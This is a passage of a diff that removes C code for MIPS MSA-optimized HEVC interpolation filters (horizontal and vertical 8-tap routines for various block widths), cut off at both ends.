v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB4(src, 16, src0, src1, src2, src3); - src += src_stride; - LD_SB4(src, 16, src4, src5, src6, src7); - src += src_stride; - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - ST_SH4(in2_r, in2_l, in3_r, in3_l, (dst + 32), 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - ST_SH4(in2_r, in2_l, in3_r, in3_l, (dst + 32), 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - uint32_t res = (height & 0x07) >> 1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B4_SB(src0, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src2, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src4, src5, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src6, src7, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } - for (; res--; ) { - LD_SB2(src, src_stride, src0, src1); - src += 2 * src_stride; - XORI_B2_128_SB(src0, src1); - VSHF_B4_SB(src0, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - ST_D2(dst0, 0, 1, dst, dst_stride); - dst += 2 * dst_stride; - } -} - -static void hevc_hz_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, 
mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - int64_t res0, res1, res2, res3; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 mask0, mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 filt0, filt1, filt2, filt3, dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = LD_SB(ff_hevc_mask_arr + 16); - mask5 = mask4 + 2; - mask6 = mask4 + 4; - mask7 = mask4 + 6; - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - LD_SB4(src + 8, src_stride, src4, src5, src6, src7); - src += (4 * src_stride); - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src1, src1, mask0, mask0, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask4, mask4, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask1, mask1, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask5, mask5, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask2, mask2, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask6, mask6, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, 
- dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask3, mask3, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask7, mask7, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - - res0 = __msa_copy_s_d((v2i64) dst4, 0); - res1 = __msa_copy_s_d((v2i64) dst4, 1); - res2 = __msa_copy_s_d((v2i64) dst5, 0); - res3 = __msa_copy_s_d((v2i64) dst5, 1); - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - SD4(res0, res1, res2, res3, (dst + 8), dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, src_stride, src0, src2); - LD_SB2(src + 8, src_stride, src1, src3); - src += (2 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - VSHF_B2_SB(src0, src0, src1, src1, mask0, mask0, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask1, mask1, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask2, mask2, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask3, mask3, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - - ST_SH2(dst0, dst2, dst, dst_stride); - ST_SH2(dst1, dst3, dst + 8, dst_stride); - dst += (2 * dst_stride); - } -} - -static void hevc_hz_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src += src_stride; - LD_SB2(src, 16, src2, 
src3); - src += src_stride; - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask4, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask0, mask0, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask4, mask0, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask5, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask1, mask1, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask5, mask1, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask2, mask6, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask2, mask2, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask6, mask2, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask3, mask7, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask3, mask3, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask7, mask3, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - - ST_SH2(dst0, dst1, dst, 8); - ST_SH(dst2, dst + 16); - dst += dst_stride; - ST_SH2(dst3, dst4, dst, 8); - ST_SH(dst5, dst + 16); - dst += dst_stride; - } -} - -static void hevc_hz_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src2 = LD_SB(src + 24); - src += src_stride; - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src0, src1, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t 
*dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB3(src, 16, src0, src1, src2); - src3 = LD_SB(src + 40); - src += src_stride; - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask4, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask0, mask4, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask5, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask1, mask5, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask2, mask6, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask2, mask6, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask3, mask7, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask3, mask7, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - ST_SH2(dst4, dst5, (dst + 32), 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB4(src, 16, src0, src1, src2, src3); - src4 = LD_SB(src + 56); - src += src_stride; - XORI_B5_128_SB(src0, src1, src2, src3, src4); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, 
vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - ST_SH(dst0, dst); - - VSHF_B4_SB(src0, src1, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - ST_SH(dst1, dst + 8); - - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - ST_SH(dst2, dst + 16); - - VSHF_B4_SB(src1, src2, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - ST_SH(dst3, dst + 24); - - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst4, dst4, dst4, dst4); - ST_SH(dst4, dst + 32); - - VSHF_B4_SB(src2, src3, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst5 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst5, dst5, dst5, dst5); - ST_SH(dst5, dst + 40); - - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst6 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst6, dst6, dst6, dst6); - ST_SH(dst6, dst + 48); - - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst7, dst7, dst7, dst7); - ST_SH(dst7, dst + 56); - dst += dst_stride; - } -} - -static void hevc_vt_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; - int32_t res = (height & 0x07) >> 1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8; - v16i8 src9, src10, src11, src12, src13, src14; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v16i8 src1110_r, src1211_r, src1312_r, src1413_r; - v16i8 src2110, src4332, src6554, src8776, src10998; - v16i8 src12111110, src14131312; - v8i16 dst10, dst32, dst54, dst76; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filter_vec, const_vec; - - src -= (3 * src_stride); - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVR_D3_SB(src21_r, src10_r, src43_r, src32_r, src65_r, src54_r, - src2110, src4332, src6554); - XORI_B3_128_SB(src2110, src4332, src6554); - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src7, src8, src9, src10, src11, src12, src13, src14); - src += (8 * src_stride); - - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVR_B4_SB(src11, src10, src12, src11, src13, src12, src14, src13, - src1110_r, src1211_r, src1312_r, src1413_r); - ILVR_D4_SB(src87_r, src76_r, src109_r, src98_r, - src1211_r, src1110_r, src1413_r, src1312_r, - src8776, src10998, src12111110, src14131312); - XORI_B4_128_SB(src8776, src10998, src12111110, src14131312); - - dst10 = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, 
src8776, - filt0, filt1, filt2, filt3, dst10, dst10, dst10, dst10); - dst32 = const_vec; - DPADD_SB4_SH(src4332, src6554, src8776, src10998, - filt0, filt1, filt2, filt3, dst32, dst32, dst32, dst32); - dst54 = const_vec; - DPADD_SB4_SH(src6554, src8776, src10998, src12111110, - filt0, filt1, filt2, filt3, dst54, dst54, dst54, dst54); - dst76 = const_vec; - DPADD_SB4_SH(src8776, src10998, src12111110, src14131312, - filt0, filt1, filt2, filt3, dst76, dst76, dst76, dst76); - - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - src2110 = src10998; - src4332 = src12111110; - src6554 = src14131312; - src6 = src14; - } - for (; res--; ) { - LD_SB2(src, src_stride, src7, src8); - src += 2 * src_stride; - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - src8776 = (v16i8)__msa_ilvr_d((v2i64) src87_r, src76_r); - src8776 = (v16i8)__msa_xori_b((v16i8) src8776, 128); - dst10 = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, src8776, - filt0, filt1, filt2, filt3, dst10, dst10, dst10, dst10); - ST_D2(dst10, 0, 1, dst, dst_stride); - dst += 2 * dst_stride; - src2110 = src4332; - src4332 = src6554; - src6554 = src8776; - src6 = src8; - } -} - -static void hevc_vt_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src6 = src10; - } -} - -static void hevc_vt_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; 